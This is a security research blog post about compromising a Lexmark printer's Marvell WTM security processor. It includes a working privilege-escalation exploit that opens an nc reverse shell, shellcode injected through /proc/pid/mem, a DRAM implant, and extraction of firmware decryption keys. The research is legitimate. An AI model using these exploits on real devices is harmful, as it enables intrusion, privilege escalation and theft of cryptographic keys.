Let's PWN WTM!

[+] Introduction

In the previous blogpost we talked about Lexmark’s attempt to protect their newer printer firmwares with an additional layer of root filesystem encryption assisted by this Wireless Trusted Module that is part of certain Marvell SoCs. We demonstrated that simply replaying some commands to this security processor on a rooted device is enough to turn it into an oracle that can help us decrypt any newer firmwares that are protected by this mechanism. While slightly anticlimactic, we did learn quite a bit about the way WTM works as well.

It’s time to go a bit deeper and explore the other commands supported by the WTM firmware, without going through the existing netlink protocol. We need a way to talk directly to the WTM MMIO interface for starters.

[+] Some assistance from the kernel

Prodding at things like this with a full linux userland at your disposal has some advantages. You can abstract some of the lower level privileged details away in a kernel module, and script the higher level stuff in something like python for a quick turnaround in testing out various things. When I broke the Sonos root filesystem encryption I did a similar thing.

So I put together a quick kernel module that would let me peek/poke the WTM MMIO space from userland through sysfs. I also got a quick reminder of how terrible I am at cross-compiling linux kernel modules.

Then when I got to the point where it was time to load my new hax-assistance lkm I realized/remembered that the persistent backdoor I was given by Rick did not in fact provide me with a root shell, but just a low privileged one, so I could not even load the module. Let’s fix that first. :)

[+] I can haz root?

Luckily, due to some hints in the bulletin for ZDI-23-670, I was able to replicate a recently-ish fixed privilege escalation which was still present in the firmware running on my printer at this moment. Thank you, SYNACKTIV!

This LPE in /usr/bin/lbtraceapp (a setuid root binary) is hilariously stupid, so I’m going to skim over the explanation and just leave you with the exploit:

#!/bin/sh
echo "-e printk:console /usr/bin/nc 192.168.1.2 9797 -e /bin/sh" > /tmp/f
/usr/bin/lbtraceapp --apply-config=/tmp/f 2>&1

I’m not even sure what lbtraceapp is to be entirely honest, it appears to be some kind of frontend for ftrace based event tracing. But we don’t really care at this point, we got our precious rootshell. I automated some setup for sshd on the printer while I was at it, to get a more ergonomic shell experience. So we can load the LKM now, yay.

root@ET788C77F816DD:/run/cfs# insmod khax.ko
insmod: ERROR: could not insert module khax.ko: Operation not permitted

What?! Some kind of security policy that prevents us from loading kernel modules? Let’s quickly consult the code for the init_module syscall:

static int may_init_module(void)
{
	if (!capable(CAP_SYS_MODULE) || modules_disabled)
		return -EPERM;

	return 0;
}

SYSCALL_DEFINE3(init_module, void __user *, umod,
		unsigned long, len, const char __user *, uargs)
{
	int err;
	struct load_info info = { };

	err = may_init_module();
	if (err)
		return err;

	// ... 8< .....

	return load_module(&info, uargs, 0);
}

modules_disabled is definitely not true, the kernel in fact has quite a few loaded modules already. Maybe we are missing the CAP_SYS_MODULE capability somehow?

root@ET788C77F816DD:~# cat /proc/self/status | grep '^Cap'
CapInh:	0000000000000000
CapPrm:	00000004002c74e2
CapEff:	00000004002c74e2
CapBnd:	00000004002c74e2
CapAmb:	0000000000000000

CAP_SYS_MODULE is capability number 16 (0x10), which corresponds to a mask of 1 << 16 = 0x10000. That bit is indeed not set in the capability mask we inherited from our lbtraceapp LPE. Ouch.
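If you don't feel like counting bits by hand, a few lines of python will do it for you. This is only a quick sketch: the capability number 16 comes from the linux uapi header linux/capability.h, the helper name has_cap is made up for illustration, and the "full" mask is just a comparison value with the low 38 bits set.

```python
# CAP_SYS_MODULE is capability number 16 in linux/capability.h
CAP_SYS_MODULE = 16

def has_cap(mask: int, cap: int) -> bool:
    """Return True if capability number `cap` is set in a Cap* bitmask."""
    return bool(mask & (1 << cap))

lpe_shell = 0x00000004002c74e2   # CapEff of the shell we got via lbtraceapp
full_mask = 0x0000003fffffffff   # comparison value: low 38 bits all set

print("LPE shell can load modules:", has_cap(lpe_shell, CAP_SYS_MODULE))
print("full mask can load modules:", has_cap(full_mask, CAP_SYS_MODULE))
```

The same helper works for any other capability number you care about.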

[+] .. and all capabilities too, please.

So we need some way to elevate our capabilities to be able to load our kernel module. Peeping in the process tree I found this:

root      683  0.0  0.4   2820  2232 ?        Ss   Jul29  42:23 /bin/bash /usr/bin/wireless-heartbeat.sh
root     2783  0.0  0.0   2216   428 ?        S    03:25   0:00  \_ sleep 20

This is some shellscript that runs infinitely and between each action executes /bin/sleep 20. If we look at the capabilities mask for this sleep process we see:

root@ET788C77F816DD:~# cat /proc/$(pidof sleep)/status | grep '^Cap'
CapInh:	0000000000000000
CapPrm:	0000003fffffffff
CapEff:	0000003fffffffff
CapBnd:	0000003fffffffff
CapAmb:	0000000000000000

.. this process actually does have a fully enabled capabilities mask. So what if we hijack this process by stomping over some of its code using /proc/pid/mem?

#!/bin/sh
echo "/usr/bin/nohup /usr/sbin/sshd -f /tmp/sshconf &" > /tmp/s2
echo -en '\x10\xd0M\xe25\x00\x8f\xe2\x00\x00\x8d\xe51\x00\x8f\xe2\x04\x00\x8d\xe5\x00\x00\xa0\xe3\x0c\x00\x8d\xe5\r\x10\xa0\xe1\x10\x00\x8f\xe2\x0bp\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01p\xa0\xe3\x00\x00\x00\xef/bin/sh\x00\x00sh\x00\x00/tmp/s2\x00\x00\x00\x00' > /tmp/sc.bin

dd if=/tmp/sc.bin of=/proc/$(pidof sleep)/mem seek=464796 bs=1

This works nicely. We write some shellcode right after some code in .text where the nanosleep syscall is invoked. The shellcode execve’s another shellscript from /tmp, and from there we start the sshd. Our ssh sessions now actually have a fully permissioned capabilities mask and we can load our kernel module.
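For those who prefer python over dd: the dd invocation above boils down to a single positioned write, where the file offset into /proc/pid/mem is the virtual address inside the target process. A minimal sketch of that idea follows; the helper name poke is hypothetical, and the usage line in the comment simply mirrors the dd command (it is not something I ran in this form).

```python
import os

def poke(path: str, offset: int, data: bytes) -> int:
    """Write `data` at absolute `offset` in `path` without truncating it.

    Returns the number of bytes written.
    """
    fd = os.open(path, os.O_WRONLY)
    try:
        return os.pwrite(fd, data, offset)
    finally:
        os.close(fd)

# Hypothetical usage on the printer, equivalent to the dd command:
#   poke("/proc/%d/mem" % sleep_pid, 464796, open("/tmp/sc.bin", "rb").read())
```

Using pwrite avoids a separate seek and makes it obvious that nothing but the targeted bytes is touched.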

root@ET788C77F816DD:/run/cfs# insmod khax.ko
root@ET788C77F816DD:/run/cfs# dmesg | tail
[  133.200196] HAX: init
[  133.202809] HAX: Listing all platform devices:
[  133.202895] HAX: Platform device: (c1a86440) -- d1d20000.wtm-mailbox-controller
[  133.208959] HAX: WTM base: e0be9000
[  133.212246] HAX: scratch: virt=ce58f918, phys=e528000
root@ET788C77F816DD:/run/cfs# lsmod | grep hax
khax                   16384  0

[+] The WTM MMIO command interface

Quickly circling back to the OLPC input driver that talks to the WTM in the linux kernel, we find these helpful register offset defines:

#define SECURE_PROCESSOR_COMMAND   0x40
#define COMMAND_RETURN_STATUS      0x80
#define COMMAND_FIFO_STATUS        0xc4
#define PJ_RST_INTERRUPT           0xc8
#define PJ_INTERRUPT_MASK          0xcc

Since the OLPC input driver only needs to transfer a minimal amount of data back and forth, it only has to deal with a subset of the WTM MMIO space. It clears the SP_COMMAND_COMPLETE_RESET bit in the PJ_RST_INTERRUPT register, writes its command to the SECURE_PROCESSOR_COMMAND register and waits for the COMMAND_FIFO_STATUS status to reach a certain value before reading the response back from the COMMAND_RETURN_STATUS register.

The commands implemented by the wtm-client.ko driver are actually a bit more complex and shove some additional arguments into the command parameter registers, which run from register offset 0x00 up to and including 0x3c, for a total of 16 DWORDs. Similarly, the response to commands has an additional 16 registers running from offset 0x84 up to and including 0xc0. In short:

  • command input consists of a 32bit “command ID” and up to 64 bytes of data
  • command output consists of a 32bit “command response” and up to 64 bytes of data

There are some more bells and whistles in the register map, of course. But for our intents and purposes (sending commands and reading their response in a polled fashion) this is sufficient information for now.
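To make the layout a bit more tangible, here is a small sketch that turns a command ID plus arguments into the list of MMIO writes described above. The offsets come straight from the text; the constant and function names are my own, and the write order (arguments first, command register last) is an assumption based on the idea that writing the command register is what kicks off execution.

```python
# Offsets 0x40 and 0x80 are from the OLPC driver defines, the parameter
# and response ranges are as described in the text. Names are hypothetical.
REG_CMD_PARAM_BASE = 0x00   # 16 dwords: 0x00 .. 0x3c
REG_CMD            = 0x40   # SECURE_PROCESSOR_COMMAND
REG_CMD_STATUS     = 0x80   # COMMAND_RETURN_STATUS
REG_CMD_RESP_BASE  = 0x84   # 16 dwords: 0x84 .. 0xc0
MAX_DWORDS = 16

def command_writes(cmd_id, args):
    """Return the (offset, value) MMIO writes needed to issue one command.

    ASSUMPTION: arguments are written first and the command ID last.
    """
    if len(args) > MAX_DWORDS:
        raise ValueError("at most 16 argument dwords fit in the registers")
    writes = [(REG_CMD_PARAM_BASE + 4 * i, a & 0xFFFFFFFF)
              for i, a in enumerate(args)]
    writes.append((REG_CMD, cmd_id & 0xFFFFFFFF))
    return writes

def response_offsets():
    """Offsets of the 16 response data registers."""
    return [REG_CMD_RESP_BASE + 4 * i for i in range(MAX_DWORDS)]

for off, val in command_writes(0x8003, [0x8005, 0x0E528000]):
    print("write32(0x%02x, 0x%08x)" % (off, val))
```

Polling COMMAND_FIFO_STATUS and clearing the interrupt bit are deliberately left out, since the exact values to wait for are not covered here.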

[+] LKM Helper primitives

In our little LKM helper module we implement the following primitives:

Command            Arguments          Explanation
CMD_WRITE8         offset, val        write u8 val to MMIO + offset
CMD_WRITE16        offset, val        write u16 val to MMIO + offset
CMD_WRITE32        offset, val        write u32 val to MMIO + offset
CMD_READ8          offset             read u8 from MMIO + offset
CMD_READ16         offset             read u16 from MMIO + offset
CMD_READ32         offset             read u32 from MMIO + offset
CMD_GET_SCRATCH    -                  get a (physical) pointer to some scratch space
CMD_WTM_EXEC_CMD   cmd_id, cmd_args   execute WTM command cmd_id with arguments cmd_args

The ‘scratch space’ is a buffer allocated by the LKM. Some WTM commands expect a physical address containing additional data input/output. By writing to/reading from /dev/mem we can populate this scratch space and read it back in userspace.
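One detail worth spelling out when going through /dev/mem with mmap: the mapping offset has to be page-aligned, so you map the surrounding page(s) and index into them. A rough sketch of how that could look; the function names are hypothetical, and read_phys assumes a root shell and a kernel that allows /dev/mem access to the range in question.

```python
import mmap

def page_window(phys, length, page=mmap.PAGESIZE):
    """Split a physical range into (page-aligned base, offset into the
    mapping, mapping length), since mmap offsets must be page-aligned."""
    base = phys & ~(page - 1)
    delta = phys - base
    return base, delta, delta + length

def read_phys(phys, length, dev="/dev/mem"):
    """Read `length` bytes at physical address `phys` through /dev/mem."""
    base, delta, map_len = page_window(phys, length)
    with open(dev, "rb") as f:
        m = mmap.mmap(f.fileno(), map_len, mmap.MAP_SHARED,
                      mmap.PROT_READ, offset=base)
        try:
            return m[delta:delta + length]
        finally:
            m.close()

# The scratch buffer from the dmesg output sits at phys 0xe528000, which
# is already page-aligned, so delta is 0 there.
print(page_window(0x0E528000, 0x100, page=4096))
```

Writing works the same way with a read/write mapping.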

[+] Exposing WTM I/O primitives over the network

To further ease in exploration we expose all these primitives using a TCP daemon. Now we can script WTM I/O operations from python on our own computer, instead of copying scripts to the printer and running them there.

For the sake of clarity here’s a poorly drawn diagram of what we have now:

Python talks over TCP/IP to the small daemon running on the printer in userland. The small daemon can peek/poke the WTM interface MMIO through khax.ko via sysfs. The small daemon can also read and write the scratch buffer by going through /dev/mem. khax.ko does the actual MMIO operations and housekeeping of the scratch buffer. A lovely Rube Goldberg machine.

Now we can do things like:

from wtmclient import *
from util import hexdump

c = WTMClient()

scratch = c.get_scratch()
c.wtm_cmd(WTM_CMD_RNG, [0x80, scratch])
hexdump(c.scratch_read(0, 16))

The whole point is (I’ll just reiterate once again) to avoid recompiling/copying/running. Of course there are many ways to automate these various tasks, but I’ve always preferred this RPC-ish abstraction of operations.

[+] Wrapped Keys

One of my main interests when it comes to the WTM (keeping in mind the Lexmark printer of course) is this “key (un)wrapping” mechanism. How does it actually work?

The concept of key wrapping is nothing new, of course. You take secret symmetric encryption keys, and you encrypt those with some even more secret keys that are even harder to access. Now your keys have their own keys and then all you need to do is introduce an easy oracle so the whole mechanism becomes useless. ;)

On a high level the Lexmark rootfs key unwrapping is done by a single netlink command 0x05 (CMD_AES_OPERATION). Under the hood this command is composed of a few WTM commands, executed in this order: wtm_key_unwrap_load, followed by wtm_aes_init and finally wtm_aes_finish.

Let’s start by analyzing wtm_key_unwrap_load (0x8003). The arguments for this command are u16 cipher_id and u8 *blob. The cipher_id describes what kind of key we are unwrapping.

Some accepted cipher_id values are:

MODE_AES_128_ECB = 0x8000
MODE_AES_256_ECB = 0x8001
MODE_AES_128_CBC = 0x8004
MODE_AES_256_CBC = 0x8005

The blob is formed like this:

struct key_unwrap_blob_t {
  u32 cipher_id_a;
  u32 cipher_id_b;
  u8 iv[16];
  u8 body[0x200];
  u8 digest[0x20];
};
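For poking at these blobs from python, the struct maps nicely onto a struct.Struct format string. A minimal sketch, assuming little-endian fields (the printer SoC is little-endian ARM) and no padding; the names KEY_UNWRAP_BLOB and parse_key_blob are made up for illustration.

```python
import struct

# u32 cipher_id_a, u32 cipher_id_b, u8 iv[16], u8 body[0x200], u8 digest[0x20]
# ASSUMPTION: little-endian, packed without padding.
KEY_UNWRAP_BLOB = struct.Struct("<II16s512s32s")

def parse_key_blob(raw):
    """Split a wrapped key blob into its (still encrypted) fields."""
    if len(raw) < KEY_UNWRAP_BLOB.size:
        raise ValueError("blob too short: need 0x%x bytes" % KEY_UNWRAP_BLOB.size)
    a, b, iv, body, digest = KEY_UNWRAP_BLOB.unpack_from(raw)
    return {"cipher_id_a": a, "cipher_id_b": b,
            "iv": iv, "body": body, "digest": digest}

print("blob size: 0x%x" % KEY_UNWRAP_BLOB.size)
```

The total comes out at 0x238 bytes, of which the first 0x218 are everything except the digest.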

The high level and heavily simplified implementation of the wtm_key_unwrap_load command looks something like this:

aes_select_hardware_key()
iv_decrypted = aes_ecb_decrypt(blob->iv, 0x10)
aes_select_hardware_key()
aes_set_iv(iv_decrypted)
body_decrypted = aes_cbc_decrypt(blob->body, 0x200)

if sha256(body_decrypted) == blob->digest:
  aes_state_zeroize()
  aes_load_key(decrypted_blob[0x20:0x20+aes_keywidth])
  return 0
else:
  return 0x154

Here aes_select_hardware_key flips a bit in the hardware AES engine’s configuration register that makes it use a hidden/secret key that is completely invisible to us.

First the iv is decrypted, then the encrypted body is decrypted. Finally, a SHA256 digest of the first 0x218 bytes (which is everything minus the digest) of the blob with now decrypted values is taken and compared against the digest value from the blob.

If the digest checks out the AES register state is completely zeroized/reset and the unwrapped key is loaded from the decrypted body at offset +0x20 into the hardware crypto engine’s key registers (different registers for AES, HMAC, etc.).
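We can't redo the decryption part in software since the hardware key is unknown, but the integrity check and key extraction are easy to model. The sketch below works on a blob whose iv and body have already been decrypted. Big caveat: I'm treating the "+0x20" as relative to the start of the body here, which is one reading of the description above (the pseudocode indexes something called decrypted_blob instead), so the offset is a parameter. All names are hypothetical.

```python
import hashlib

HEADER_LEN = 0x18                    # cipher_id_a + cipher_id_b + iv
BODY_LEN = 0x200
SIGNED_LEN = HEADER_LEN + BODY_LEN   # 0x218: everything except the digest
DIGEST_LEN = 0x20

def check_and_extract(decrypted_blob, key_len=32, key_offset_in_body=0x20):
    """Verify the SHA256 digest of an already-decrypted blob and return
    the unwrapped key, or None on mismatch (the firmware returns 0x154).

    ASSUMPTION: key_offset_in_body is relative to the start of the body.
    """
    signed = decrypted_blob[:SIGNED_LEN]
    digest = decrypted_blob[SIGNED_LEN:SIGNED_LEN + DIGEST_LEN]
    if hashlib.sha256(signed).digest() != digest:
        return None
    body = signed[HEADER_LEN:]
    return body[key_offset_in_body:key_offset_in_body + key_len]
```

If you ever get your hands on a fully decrypted blob, passing key_offset_in_body=0x08 tests the other interpretation (offset 0x20 from the start of the whole blob).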

So there are two unknowns (for us) here. First the secret hardware key, and secondly the unwrapped key from the decrypted keyblob, which is loaded directly into the AES engine.

This unwrapped key is then used (in Lexmark’s case) to decrypt the encrypted root filesystem key.

While digging through the (quite extensive) command list in the WTM firmware I found some commands with peculiar names:

0x3001: wtm_load_engine_context
0x3002: wtm_store_engine_context
0x3003: wtm_load_engine_context_external
0x3004: wtm_store_engine_context_external

After reversing them I learned they are used to save/restore the crypto engine state. The _external variants will save/load the state to/from some DRAM address we provide. Let’s see what state is actually preserved when saving, for the AES engine:

int __fastcall aes_store_context(int a1)
{
  mem_move32(a1 + 0x10, 0xD1D21000, 7);
  mem_move32(a1 + 0x68, 0xD1D21058, 21);
  return 0;
}

0xD1D21000 is the base address for the AES engine MMIO. So it saves 7 registers starting at offset 0x00, and another 21 registers starting at offset 0x58. These are spilled back to a DRAM address we provide (at offset 0x10 and 0x68 respectively).

Let’s have a look at the register map for the AES engine, as far as I’ve managed to infer by looking at code, anyway:

0x00: CONTROL
..
0x0c: STATUS
..
0x18: SIZE
[0x78 .. 0x98]: KEY
[0x98 .. 0xA8]: IV

Yes sorry, quite some gaps and unknowns. But importantly, the KEY registers are actually preserved when this wtm_store_engine_context_external command is invoked.
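To figure out where a given AES register ends up in the saved context, we can simply replay the two mem_move32 calls as a lookup. A small sketch (the names SAVED_RANGES and ctx_offset are mine, the numbers are taken from aes_store_context above):

```python
# (context offset, first register offset, register count), one entry per
# mem_move32 call in aes_store_context
SAVED_RANGES = [(0x10, 0x00, 7), (0x68, 0x58, 21)]

def ctx_offset(reg):
    """Map an AES engine register offset to its offset in the saved
    context, or None if that register is not part of the saved state."""
    for ctx_base, reg_base, count in SAVED_RANGES:
        if reg_base <= reg < reg_base + 4 * count:
            return ctx_base + (reg - reg_base)
    return None

print("KEY starts at context offset", hex(ctx_offset(0x78)))  # 0x88
print("IV  starts at context offset", hex(ctx_offset(0x98)))  # 0xa8
```

So the 32 bytes of an AES-256 key should show up at 0x88 .. 0xa8 in the stored context.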

Let’s try it out with the wrapped keyblob from Lexmark:

c = WTMClient()

scratch = c.get_scratch()

# write wkey4 to scratch
c.scratch_write(0, open("wkey4.bin", "rb").read())

# load wrapped key
c.wtm_cmd(WTM_CMD_KEY_UNWRAP_LOAD, [MODE_AES_256_CBC, scratch])
rv = c.io_read32(REG_CMD_RETURN_STATUS)
assert rv == 0

# store AES engine context to scratch buffer
c.scratch_write(0, b"\xAA" * 0x100)
c.wtm_cmd(WTM_CMD_STORE_ENGINE_CONTEXT_EXTERNAL, [MODE_AES_256_CBC, scratch])
rv = c.io_read32(REG_CMD_RETURN_STATUS)
print("Store engine context status: 0x%08x" % rv)

# dump it to the screen
hexdump(c.scratch_read(0, 0x100))

$ python3 test_unwrap.py
Store engine context status: 0x00000000
00000000: aaaa aaaa aaaa aaaa aaaa aaaa 0580 0000  ................
00000010: 0200 0000 0000 0000 0000 0000 0000 0000  ................
00000020: 0000 0000 0000 0000 0000 0000 aaaa aaaa  ................
00000030: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa  ................
00000040: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa  ................
00000050: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa  ................
00000060: aaaa aaaa aaaa aaaa 0000 0000 0000 0000  ................
00000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000080: 0000 0000 0000 0000 7930 6820 6430 3064  ........y0h d00d
00000090: 2c20 6730 2064 756d 7020 6a30 3072 2030  , g0 dump j00r 0
000000a0: 776e 206b 3379 7a21 0000 0000 0000 0000  wn k3yz!........
000000b0: 0000 0000 0000 0000 0100 0000 aaaa aaaa  ................
000000c0: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa  ................
000000d0: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa  ................
000000e0: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa  ................
000000f0: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa  ................

We expect the key bits to be at 0x88 and onwards .. and well what do you know, there actually appears to be data there!

If we do an AES-256-CBC decrypt operation on the encrypted rootFS key, using the IV that is stored alongside it and the key we just dumped from the AES engine state, we do in fact get the correct decrypted rootFS key!

So this intermediary key that is typically not leaving WTM can actually be leaked back, fun. We’re still missing the secret algorithm/key that is used by the AES engine though. What we do gain here is the capability to completely decrypt new root filesystem keys offline as long as the wrapped keys are re-used. Lexmark has already been re-using their wrapped keys in newer firmwares. And new wrapped keys can be unwrapped and dumped for offline usage using our oracle capabilities of course.

[+] Going deeper

All this highlevel peeky-pokey of the WTM MMIO interface from the Application Processor side is fun of course, but wouldn’t it be neat if we could get arbitrary code execution on the WTM itself?

There are a ton of commands, surely one of them has a dumb vulnerability? We could audit them all and find something perhaps. We know some of the WTM commands take physical DRAM pointers as arguments, and it can read/write (also through a DMA engine) to them. Makes sense that the WTM can access the Application Processor’s DRAM.

.. wait a second ..

Is there some dedicated DRAM for the WTM itself, surely they can’t run a full fledged linux kernel entirely from some dedicated SRAM? Or are they.. sharing the same DRAM between the AP and the WTM? That would be naive, right?

Turns out, the WTM’s linux kernel runs entirely from the same DRAM that is fully accessible by the Application Processor. The Wireless Trusted Module™ can be compromised simply by poking into /dev/mem from the Untrusted Module™ (lol) at the right spots.

[+] WTM RCE Strategy

Okay, let’s come up with a strategy here. It would be nice if we could expand our existing exploration infrastructure with another layer of indirection. Since we can already talk to the WTM directly through the MMIO command interface it would be nice to replace some pointless command with some shellcode of our own. The replaced command can then implement some sub-commands to do various operations/primitives, but this time executed from the context of code running on the WTM itself!

I chose to hijack the handler for wtm_dh_shared_key_gen for no good reason other than because its command ID is 0x9001 (it’s over 9000 lololol).

We’re introducing a really basic implant there:

cmp	r0, #1
beq	cmd_peek32
cmp	r0, #2
beq	cmd_poke32

mov	r0, #0
bx	lr

cmd_peek32:
ldr	r1, [r1]
str	r1, [r2]
bx	lr

cmd_poke32:
str	r2, [r1]
mov	r0, #0
bx	lr
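If ARM assembly isn't your thing, here is the same dispatch logic as a tiny python model. It assumes the first three command arguments arrive in r0, r1 and r2 (which is what the assembly suggests) and models memory as a plain dict; the function name implant is of course just for illustration.

```python
def implant(mem, r0, r1, r2):
    """Software model of the implant. `mem` maps address -> u32.
    Returns the value left in r0 when the handler returns."""
    if r0 == 1:                      # cmd_peek32
        mem[r2] = mem.get(r1, 0)     # ldr r1, [r1] ; str r1, [r2]
        return r0                    # r0 is left untouched on this path
    if r0 == 2:                      # cmd_poke32
        mem[r1] = r2 & 0xFFFFFFFF    # str r2, [r1]
        return 0
    return 0                         # unknown sub-command

mem = {0xFFE00000: 0xEA000006}       # made-up example contents
implant(mem, 1, 0xFFE00000, 0x0E528000)
print(hex(mem[0x0E528000]))
```

Note that peek hands back its result through memory at the address in r2 rather than through a return value, which is why a scratch buffer address gets passed along for reads.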

We locate the wtm_dh_shared_key_gen code by scanning through all of DRAM via /dev/mem, and then we stomp over it with our small handler replacement code.
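The scanning part is nothing fancy. A sketch of how such a chunked signature search could look is below; it keeps a small overlap between chunks so a match that straddles a chunk boundary isn't missed. The function name and the signature bytes in the usage comment are hypothetical, and a real scan of /dev/mem also has to cope with holes and ranges the kernel refuses to hand out, which this sketch ignores.

```python
import io

def find_pattern(stream, pattern, chunk_size=1 << 20):
    """Yield absolute offsets of `pattern` in a binary stream, reading it
    in chunks and carrying over len(pattern) - 1 bytes between chunks."""
    if not pattern:
        raise ValueError("pattern must not be empty")
    overlap = len(pattern) - 1
    tail = b""
    base = 0                       # absolute offset of tail[0]
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        buf = tail + chunk
        pos = buf.find(pattern)
        while pos != -1:
            yield base + pos
            pos = buf.find(pattern, pos + 1)
        keep = buf[len(buf) - overlap:] if overlap else b""
        base += len(buf) - len(keep)
        tail = keep

# Hypothetical usage, with SIGNATURE being the first few instructions of
# the handler taken from the WTM firmware image:
#   with open("/dev/mem", "rb") as f:
#       hits = list(find_pattern(f, SIGNATURE))
data = b"\x00" * 10 + b"ABCD" + b"\x00" * 7 + b"ABCD"
print(list(find_pattern(io.BytesIO(data), b"ABCD", chunk_size=4)))
```

With more than one hit you would want a longer signature before stomping over anything.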

Quite lazy, but we can add some powerful new primitives to our WTMClient python codebase now:

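import struct

WTM_CMD_HAX = 0x9001

# sub-command IDs, matching the cmp r0, #1 / cmp r0, #2 in the implant
WTM_HAX_CMD_READ32 = 1
WTM_HAX_CMD_WRITE32 = 2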

def wtm_read32(self, addr):
    self.wtm_cmd(WTM_CMD_HAX, [WTM_HAX_CMD_READ32, addr, self.scratch])
    return struct.unpack("<L", self.scratch_read(0, 4))[0]

def wtm_write32(self, addr, value):
    self.wtm_cmd(WTM_CMD_HAX, [WTM_HAX_CMD_WRITE32, addr, value])

def wtm_clear32(self, addr, value):
    self.wtm_write32(addr, self.wtm_read32(addr) & (~value & 0xFFFFFFFF))

def wtm_set32(self, addr, value):
    self.wtm_write32(addr, self.wtm_read32(addr) | value)

[+] Now what?

Let’s confirm it works by ehm, reading the WTM BootROM I guess?

from wtmclient import *

c = WTMClient()

ROM_BASE = 0xFFE00000
ROM_SIZE = 0x00020000

rom = b""
for i in range(ROM_SIZE // 4):
    rom += c.wtm_read32(ROM_BASE + i * 4).to_bytes(4, "little")

with open("rom.bin", "wb") as f:
    f.write(rom)

Let’s try to dump the full eFUSE/OTP array while we’re at it. There is a high level WTM command wtm_otp_block_read (0x2009), but it doesn’t actually provide unrestricted access to the full OTP. It keeps a curated list of entries you can access.

Using our WTM peek/poke implant it’s simple enough to read it out fully by peeking at the right MMIO addresses for the OTP/eFUSE peripheral:

import struct
from wtmclient import *

c = WTMClient()

OTP_BASE = 0xD1D22800
OTP_SIZE = 0x800

o = b""
for i in range(OTP_BASE, OTP_BASE + OTP_SIZE, 4):
    o += struct.pack("<I", c.wtm_read32(i))

with open("otp.bin", "wb") as f:
    f.write(o)

What’s really left (and somewhat worthwhile, for a certain twisted definition of worthwhile) to do though is figuring out how the hidden hardware AES key stuff works. I’ve tried some obvious things like partial key overwrites and whatnot, but so far I haven’t had any luck. That said, I haven’t invested too much time into it either. It’s mostly a prestige thing. Our original goal (dealing with Lexmark’s pesky new rootfs encryption) has long been dealt with. ;-)

[+] Conclusion

I had quite some fun working on this software-only OSINT and blackbox-y approach to breaking into the Marvell WTM, and I hope you had some fun reading. The writeup was (as always) done months after the actual hacking, so I hope I didn’t mess up any details. I’ve tried to structure the blogposts as some kind of incremental buildup, but the actual order of my research at the time was very out-of-order with what you read here. I’ve cleaned up a bit and published all the relevant code.

Enjoy!